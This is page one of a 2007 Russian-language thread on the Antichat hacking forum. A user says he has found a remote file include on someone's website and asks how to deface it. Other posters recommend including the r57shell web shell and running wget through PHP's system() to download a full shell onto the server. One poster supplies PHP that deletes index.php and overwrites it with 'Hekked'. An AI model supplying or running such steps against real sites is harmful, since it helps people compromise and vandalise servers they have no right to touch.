Форум АНТИЧАТ
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Не работает system("echo Hacked > index.php"); (https://forum.antichat.xyz/showthread.php?t=47070)

blackbarrie 19.08.2007 16:14
Не работает system("echo Hacked > index.php");
 
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php"); 
не работает. Через
PHP код:
fopen("index.php""w"
тоже ессно ничего не выходит :mad:
Как можно это обойти?

И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
  echo system("cd ../");
  $cmd "ls";
  echo "command: <b>" $cmd "</b><br>";
  echo system($cmd); 
не работает...

n1†R0x 19.08.2007 16:34
system() может быть запрещено использовать сервером
по поводу fopen() - это уже странно.. ты уверен, что прав хватает? я сомневаюсь...

blackbarrie 19.08.2007 16:46
system разрешён. потому как
PHP код:
  $cmd "ls"
  echo "command: <b>" $cmd "</b><br>"
  echo system($cmd); 
выполняется на ура.
А вот то что прав не хватает - скорее оно так и есть. Что можно предпринять в этом случае?

ShAnKaR 19.08.2007 16:55
проинклудь шел какойнить и посмотри

blackbarrie 19.08.2007 17:22
Пытался проинклудить r57shell, но в итоге получаю пустую страницу...

Termin@L 19.08.2007 17:31
Цитата:
Сообщение от blackbarrie
Нашёл на сайте удалённый инклуд. Могу подключать и выполнять любые PHP скрипты. Но есть одно но
Я не могу на том сервере создавать и писать в файлы
PHP код:
system("echo Hacked > index.php"); 
не работает. Через
PHP код:
fopen("index.php""w"
тоже ессно ничего не выходит :mad:
Как можно это обойти?

И вопрос в догонку:
Как мне получить список файлов каталога, который находится на порядок выше?
PHP код:
  echo system("cd ../");
  $cmd "ls";
  echo "command: <b>" $cmd "</b><br>";
  echo system($cmd); 
не работает...
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
Команда для листинга верхнего каталога -
ls /../

blackbarrie 19.08.2007 17:34
Опа, спасибо... а я пытался сделать
PHP код:
system("ls ../"); 
:)
Цитата:
Не понял, зачем использовать echo c system(). Результат она и так на экран выводит.
:rolleyes: буду знать :)

Но всё же, как задефейсить в данном случае? :)

Termin@L 19.08.2007 17:42
С помощью качалки стоящей на сервере скачиваешь полноценный шелл - это либо wget, curl и т.д. если не стоит ничего есть команда lwp-mirror, почитай вобще в гуглу
что-то типа - system('wget http://shell.php')

+toxa+ 19.08.2007 17:48
PHP код:
unlink('index.php');
$data='Hekked';
$fp=fopen('./index.php','wb');
fputs($fp,$data);
fclose($fp); 

blackbarrie 19.08.2007 18:10
Выполняю комманду system('wget http://site/shell.txt'), а потом system('ls')
Изменений не видно...


Время: 11:05
Страница 1 из 4 1 2 3 4 >
Показывать 40 сообщений этой темы на одной странице